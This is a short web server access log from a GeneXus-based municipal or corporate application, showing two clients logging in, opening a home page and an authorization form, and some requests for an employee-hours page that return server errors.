190.171.149.74 - - [26/Apr/2024:11:55:51 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1742
200.54.100.179 - - [26/Apr/2024:11:55:53 -0300] "GET /cormun/servlet/trfichaempleadohoras HTTP/1.1" 500 10
200.54.100.179 - - [26/Apr/2024:11:55:55 -0300] "GET /cormun/servlet/trfichaempleadohoras HTTP/1.1" 500 10
190.171.149.74 - - [26/Apr/2024:11:55:58 -0300] "POST /cormun/servlet/hlogin?c82052c7e42a3f8e323a217ad28e6842,gx-no-cache=1714143241708 HTTP/1.1" 200 90
190.171.149.74 - - [26/Apr/2024:11:55:59 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 953
190.171.149.74 - - [26/Apr/2024:11:55:59 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4251
190.171.149.74 - - [26/Apr/2024:11:56:01 -0300] "GET /cormun/servlet/trautorizarsolicitud? HTTP/1.1" 200 8767
190.171.149.74 - - [26/Apr/2024:11:56:09 -0300] "POST /cormun/servlet/trautorizarsolicitud?c82052c7e42a3f8e323a217ad28e6842,,gx-no-cache=1714143252390 HTTP/1.1" 200 4779
190.171.149.74 - - [26/Apr/2024:11:56:09 -0300] "POST /cormun/servlet/trautorizarsolicitud?c82052c7e42a3f8e323a217ad28e6842,,gx-no-cache=1714143252498 HTTP/1.1" 200 4537
200.54.100.179 - - [26/Apr/2024:11:56:12 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1725
200.54.100.179 - - [26/Apr/2024:11:56:15 -0300] "POST /cormun/servlet/hlogin?c3095aea5308f3386c892ad2524291c9,gx-no-cache=1714143260817 HTTP/1.1" 200 90
200.54.100.179 - - [26/Apr/2024:11:56:15 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 967
200.54.100.179 - - [26/Apr/2024:11:56:15 -0300] "GET /cormun/servlet/trfichaempleadohoras HTTP/1.1" 500 10
200.54.100.179 - - [26/Apr/2024:11:56:17 -0300] "GET /cormun/servlet/trfichaempleadohoras HTTP/1.1" 500 10
200.54.100.179 - - [26/Apr/2024:11:57:47 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1722
200.54.100.179 - - [26/Apr/2024:11:57:47 -0300] "GET /cormun/static/gxtimezone.js?85251 HTTP/1.1" 200 5781
200.54.100.179 - - [26/Apr/2024:11:57:47 -0300] "GET /cormun/static/gxcfg.js?2022112219184450 HTTP/1.1" 200 953
